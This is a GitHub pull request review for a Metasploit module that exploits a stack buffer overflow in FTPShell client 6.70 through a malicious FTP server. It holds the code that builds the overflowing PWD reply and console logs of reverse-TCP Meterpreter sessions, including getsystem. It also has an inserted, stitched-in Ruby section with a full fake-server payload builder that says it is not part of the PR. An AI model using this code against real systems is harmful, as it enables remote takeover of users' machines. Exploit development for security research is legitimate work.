
FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow #10213

Merged
merged 6 commits into from Jun 29, 2018

Conversation

@DanielRTeixeira DanielRTeixeira commented Jun 27, 2018

This PR adds a module to exploit a remote buffer overflow in the FTPShell client 6.70.

Tested on: Windows 7 Enterprise SP1 x64

Verification

List the steps needed to make sure this thing works

  • Install the application
  • Start msfconsole
  • use exploit/windows/ftp/labf_nfsaxe
  • Set the payload
  • Exploit
  • Connect to the FTP server using the FTP client
  • Get a session

Example

msf > use exploit/windows/ftp/ftpshell_cli_bof 
msf exploit(windows/ftp/ftpshell_cli_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/ftpshell_cli_bof) > set LHOST 172.16.106.129 
LHOST => 172.16.106.129
msf exploit(windows/ftp/ftpshell_cli_bof) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.106.129:4444 
[*] Please ask your target(s) to connect to 172.16.106.129:21
[*] Server started.
msf exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.106.128 - connected.
[*] 172.16.106.128 - Response: Sending 220 Welcome
[*] 172.16.106.128 - Request: USER anonymous
[*] 172.16.106.128 - Response: sending 331 OK
[*] 172.16.106.128 - Request: PASS anonymous@anon.com
[*] 172.16.106.128 - Response: Sending 230 OK
[*] 172.16.106.128 - Request: PWD
[*] 172.16.106.128 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.106.128
[*] Meterpreter session 1 opened (172.16.106.129:4444 -> 172.16.106.128:49263) at 2018-06-27 11:19:38 -0400

msf exploit(windows/ftp/ftpshell_cli_bof) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

@bcoles bcoles left a comment

LGTM. Minor comments.


    sploit = "220 \""
    sploit << payload.encoded
    sploit << "\x20"*(400-payload.encoded.length)
Contributor

I believe you can use payload_space from Msf::Module::Target here, rather than hardcoding 400.

Also, some white space between operators makes this a little easier to read.

    sploit << "\x20" * (payload_space - payload.encoded.length)


    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
Contributor

Single quotes are preferred when string interpolation isn't required.

Also, my personal preference is to format register_options as follows when there's only one option with a short description.

    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]

or:

    register_options [
      OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ])
    ]

Contributor Author

Fixed the register_options.

    'Author' =>
      [
        'r4wd3r', # Original exploit author
        'Daniel Teixeira <danieljcrteixeira[at]gmail.com>' # MSF module author
Contributor

It looks like you're mentioned in about a dozen modules, and usually without an associated email address.

If you like, we can add your name to the .mailmap file. That way your email will be auto-populated in the documentation and when viewing the module info within msfconsole. Up to you.

# grep -rni 'Daniel Teixeira' modules/
modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb:22:        'Daniel Teixeira'      # MSF module author
modules/exploits/windows/browser/exodus.rb:27:          'Daniel Teixeira' # MSF module author
modules/exploits/windows/ftp/ayukov_nftp.rb:23:          'Daniel Teixeira',  # MSF module author
modules/exploits/windows/ftp/labf_nfsaxe.rb:23:          'Daniel Teixeira'  # MSF module author
modules/exploits/windows/http/dupscts_bof.rb:27:          'Daniel Teixeira'  # Metasploit module
modules/exploits/windows/http/vxsrchs_bof.rb:26:          'Daniel Teixeira'
modules/exploits/windows/http/syncbreeze_bof.rb:26:          'Daniel Teixeira',
modules/exploits/windows/http/disksorter_bof.rb:26:          'Daniel Teixeira'
modules/exploits/windows/fileformat/syncbreeze_xml.rb:22:          'Daniel Teixeira'
modules/exploits/windows/fileformat/dupscout_xml.rb:22:          'Daniel Teixeira'
modules/exploits/windows/misc/cloudme_sync.rb:24:          'Daniel Teixeira' # MSF module author
modules/exploits/windows/misc/disk_savvy_adm.rb:24:          'Daniel Teixeira'
modules/auxiliary/dos/http/slowloris.py:24:        'Daniel Teixeira',  # Metasploit module (Ruby)

Contributor Author

Thank you, I would appreciate that if you could.


Contributor Author

Thank you

    super(update_info(info,
      'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
Contributor

Line wrap at ~80 columns is preferred, but not required. In this instance it would make sense, as the following line contains only two words.

Contributor Author

Done, thanks.

    res = client.get_once.to_s.strip
    print_status("#{client.peerhost} - Request: #{res}")

    sploit = "220 \""
Contributor

No need to use double quotes and escaping here.

    sploit = '220 "'

Contributor Author

Done.

        'SRVHOST' => '0.0.0.0',
        'EXITFUNC' => 'thread'
      },
      'DisclosureDate' => 'May 15 2017',
Contributor

Is this 2017 disclosure date accurate? The CVE listed in References is from 2018.

A quick grep reveals this might be a result of forgotten copypasta from another FTP module:

# grep -rn "'May 15 2017'" modules/exploits/
modules/exploits/windows/ftp/labf_nfsaxe.rb:45:      'DisclosureDate' => 'May 15 2017',
[...]

However, it appears there was a previous similar bug reported in FTPShell with CVE (2017-6465) dated March 9th 2017, with an exploit published on EDB on March 4th 2017.

If these are applicable, please add refs:

  • BID: 96570
  • EDB: 41511
  • CVE: 2017-6465

Contributor Author

I'm sorry, I've fixed the disclosure date to March 4 2017

    sploit << payload.encoded
    sploit << '\x20' * (payload_space - payload.encoded.length)
    sploit << target.ret
    sploit << '" is current directory\r\n'
Contributor

It looks like you were a little overzealous in replacing " with '.

Double quotes are needed for escaping, such as hex and CRLF.

    sploit = '220 "'
    sploit << payload.encoded
    sploit << "\x20" * (payload_space - payload.encoded.length)
    sploit << target.ret
    sploit << "\" is current directory\r\n"

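Putting the two pieces of this thread together, the FTP exchange in the PR description's log (banner, USER, PASS, PWD) and the response layout in the suggestion just above, here is an added example in Ruby that is not the module's code and not part of the PR: a small fake-server class that answers the client's commands and builds the oversized PWD reply. `FakeFtpServer`, `demo_session`, the 400-byte `payload_space`, the 4-byte little-endian `ret` value and the NOP-sled stand-in payload are all assumptions for illustration. It also adds one check the snippet above does not have: a payload longer than `payload_space` is rejected up front with a clear message, since otherwise Ruby's `String#*` raises a bare "negative argument" error at the padding line.

```ruby
# Added example, not the Metasploit module's code. Models the malicious
# FTP server side of the exchange shown in the PR log and builds the
# oversized PWD response. Class/method names and constants are assumed.

class FakeFtpServer
  # payload: raw shellcode bytes (binary string)
  # payload_space: bytes between the opening quote and the saved return
  #   address (400 is the value used in the PR, assumed here)
  # ret: 4-byte return address; x86 process, so a 32-bit saved EIP (assumed)
  def initialize(payload:, payload_space:, ret:)
    if payload.bytesize > payload_space
      raise ArgumentError, "payload is #{payload.bytesize} bytes, space is #{payload_space}"
    end
    raise ArgumentError, 'ret must be exactly 4 bytes' unless ret.bytesize == 4
    @payload = payload
    @payload_space = payload_space
    @ret = ret
  end

  # Banner the server sends as soon as the client connects.
  def banner
    "220 Welcome\r\n"
  end

  # Reply for one client request line; only PWD carries the overflow.
  def respond(request)
    verb, = request.to_s.strip.split(' ', 2)
    case verb.to_s.upcase
    when 'USER' then "331 OK\r\n"
    when 'PASS' then "230 OK\r\n"
    when 'PWD'  then malicious_pwd
    else "500 Unknown command\r\n"
    end
  end

  # Same layout as the PR's response: quoted "path" = shellcode, space
  # padding up to payload_space, the return address, then a normal tail.
  # Everything is built as a binary (ASCII-8BIT) string so byte counts
  # are exact regardless of source encoding.
  def malicious_pwd
    sploit = '220 "'.b
    sploit << @payload
    sploit << "\x20".b * (@payload_space - @payload.bytesize)
    sploit << @ret
    sploit << "\" is current directory\r\n".b
    sploit
  end
end

# Constructed sample input: a NOP sled stand-in, not real shellcode, and
# an arbitrary return address packed little-endian.
SAMPLE_PAYLOAD = "\x90".b * 64
SAMPLE_RET = [0xdeadbeef].pack('V')

# Replays the client command sequence from the PR log and returns every
# server message in order (banner first).
def demo_session(payload: SAMPLE_PAYLOAD, payload_space: 400, ret: SAMPLE_RET)
  srv = FakeFtpServer.new(payload: payload, payload_space: payload_space, ret: ret)
  transcript = [srv.banner]
  ['USER anonymous', 'PASS anonymous@anon.com', 'PWD'].each do |req|
    transcript << srv.respond(req)
  end
  transcript
end

if __FILE__ == $0
  demo_session.each { |msg| puts msg.inspect }
end
```

With the 64-byte sample payload, `respond('PWD')` returns 433 bytes: 5 bytes of `220 "`, 400 bytes of payload plus space padding, the 4-byte return address at offset 405, and the 24-byte `" is current directory\r\n` tail. Note the use of `bytesize` rather than `length`; they agree for the binary strings Metasploit hands back from `payload.encoded`, but not for a UTF-8 string containing multibyte characters.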
    end

    def on_client_connect(client)
      return if ((p = regenerate_payload(client)) == nil)
Contributor

.nil? is preferred

bcoles commented Jun 29, 2018

I think the include Msf::Exploit::Remote::Egghunter mixin can be removed as it's not used.

If you fix the issues outlined above (double quotes, mixin, .nil?) then I'll proceed with merge.

msf5 exploit(windows/ftp/ftpshell_cli_bof) > rexploit 
[*] Stopping existing job...

[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job 10.

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Please ask your target(s) to connect to 172.16.191.188:21
[*] Server started.
msf5 exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.191.153 - connected.
[*] 172.16.191.153 - Response: Sending 220 Welcome
[*] 172.16.191.153 - Request: USER anonymous
[*] 172.16.191.153 - Response: sending 331 OK
[*] 172.16.191.153 - Request: PASS anonymous@anon.com
[*] 172.16.191.153 - Response: Sending 230 OK
[*] 172.16.191.153 - Request: PWD
[*] 172.16.191.153 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.191.153

msf5 exploit(windows/ftp/ftpshell_cli_bof) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         meterpreter x86/windows  WIN-SGBSD5TQUTQ\user @ WIN-SGBSD5TQUTQ  172.16.191.188:4444 -> 172.16.191.153:49479 (172.16.191.153)

msf5 exploit(windows/ftp/ftpshell_cli_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-SGBSD5TQUTQ\user
meterpreter > 

I ran into a couple of issues. Seems the exploit is not 100% reliable, which is ok for NormalRanking. I tried playing around with the number of tabs open, and the tab names, but this wasn't conclusive.

[screenshot: ftp-shell]

@bcoles bcoles self-assigned this Jun 29, 2018
@DanielRTeixeira
Contributor Author

All done, hopefully this will address all the issues. Thank you for all the help.

bcoles commented Jun 29, 2018

LGTM

msf5 exploit(windows/ftp/ftpshell_cli_bof) > 
[*] 172.16.191.153 - Response: Sending 220 Welcome
[*] 172.16.191.153 - Request: USER anonymous
[*] 172.16.191.153 - Response: sending 331 OK
[*] 172.16.191.153 - Request: PASS anonymous@anon.com
[*] 172.16.191.153 - Response: Sending 230 OK
[*] 172.16.191.153 - Request: PWD
[*] 172.16.191.153 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.191.153

msf5 exploit(windows/ftp/ftpshell_cli_bof) > sessions -i 

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         meterpreter x86/windows  WIN-SGBSD5TQUTQ\user @ WIN-SGBSD5TQUTQ  172.16.191.188:4444 -> 172.16.191.153:49503 (172.16.191.153)

msf5 exploit(windows/ftp/ftpshell_cli_bof) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-SGBSD5TQUTQ\user
meterpreter > sysinfo
Computer        : WIN-SGBSD5TQUTQ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > getsystem

bcoles commented Jun 29, 2018

Release Notes

The exploit/windows/ftp/ftpshell_cli_bof module has been added to the framework. It exploits a stack-based buffer overflow vulnerability in FTPShell client 6.70 (Enterprise edition) on Windows systems.

r4wd3r commented Jul 3, 2018

Nice job @DanielRTeixeira. Thanks for the credit on this one ;)


ghost commented Dec 28, 2018

Hello, the success rate of this vulnerability is not 100%, is there any solution?
